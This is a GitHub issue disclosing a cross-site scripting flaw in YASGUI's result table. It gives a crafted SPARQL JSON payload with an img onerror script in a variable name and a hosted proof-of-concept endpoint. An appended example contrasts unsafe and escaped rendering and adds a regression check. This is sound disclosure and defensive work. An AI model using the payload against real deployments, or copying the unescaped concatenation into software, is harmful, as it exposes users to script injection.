
Cross-Site Scripting (XSS) vulnerability in YASGUI result set table #221

Open · ktk opened this issue Apr 14, 2023 · 0 comments · May be fixed by #222

Comments


ktk commented Apr 14, 2023

Same source as in #220

The company has discovered a potential Cross-Site Scripting (XSS) vulnerability in YASGUI. The vulnerability is caused by the way YASGUI handles the SPARQL result set JSON returned by a malicious endpoint URL. Specifically, the SPARQL result set JSON can be abused to execute JavaScript code and trigger an XSS attack on the web application.

To reproduce the vulnerability, the following endpoint URL can be used:

https://rtp7.ch/sparql_poc.php

This endpoint URL contains a payload that includes unescaped HTML code that can be used to execute JavaScript code and trigger an XSS attack. The payload is as follows:

```json
{"head":{"vars":["subs<img src=x onerror=alert('XSS') >a","pred","obj"]},"results":{"bindings":[{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#label"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#comment"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#range"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#seeAlso"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subPropertyOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Class"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#domain"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Resource"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subClassOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}}]}}
```
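As an added example (not YASGUI's own code and not part of the report), a minimal stand-in for rendering `head.vars` as a table header row: the string-concatenation pattern under which a crafted variable name becomes live markup, beside the escaped form that keeps every result-set value as text. The `head.vars` from the payload above is reused as constructed input; the function names and the clean-header check are hypothetical.

```javascript
// Added example, not YASGUI's code: a stand-in for turning the "head.vars"
// of a SPARQL JSON result set into a <tr> of <th> cells.

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The defect pattern: variable names from an untrusted endpoint are
// concatenated straight into markup, so a crafted name is parsed as HTML.
function renderHeaderRowUnsafe(result) {
  const cells = result.head.vars.map((v) => "<th>" + v + "</th>");
  return "<tr>" + cells.join("") + "</tr>";
}

// The fix: every value coming back from the endpoint is data, never markup.
// (In a DOM-based renderer the equivalent is th.textContent = v, not innerHTML.)
function renderHeaderRowSafe(result) {
  const cells = result.head.vars.map((v) => "<th>" + escapeHtml(v) + "</th>");
  return "<tr>" + cells.join("") + "</tr>";
}

// Regression check for a test suite: the rendered row may contain only the
// four expected tags and exactly one <th> per variable; any other tag means
// endpoint-controlled text leaked into the markup.
function headerCellsLookClean(html, expectedCount) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  const allowed = new Set(["<tr>", "</tr>", "<th>", "</th>"]);
  const thCount = (html.match(/<th>/g) || []).length;
  return tags.every((t) => allowed.has(t)) && thCount === expectedCount;
}

// Constructed sample: the head.vars from the report, with no bindings.
const SAMPLE_RESULT = {
  head: { vars: ["subs<img src=x onerror=alert('XSS') >a", "pred", "obj"] },
  results: { bindings: [] },
};

console.log("unsafe clean?", headerCellsLookClean(renderHeaderRowUnsafe(SAMPLE_RESULT), 3));
console.log("safe clean?  ", headerCellsLookClean(renderHeaderRowSafe(SAMPLE_RESULT), 3));
```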
tpluscode linked a pull request May 1, 2023 that will close this issue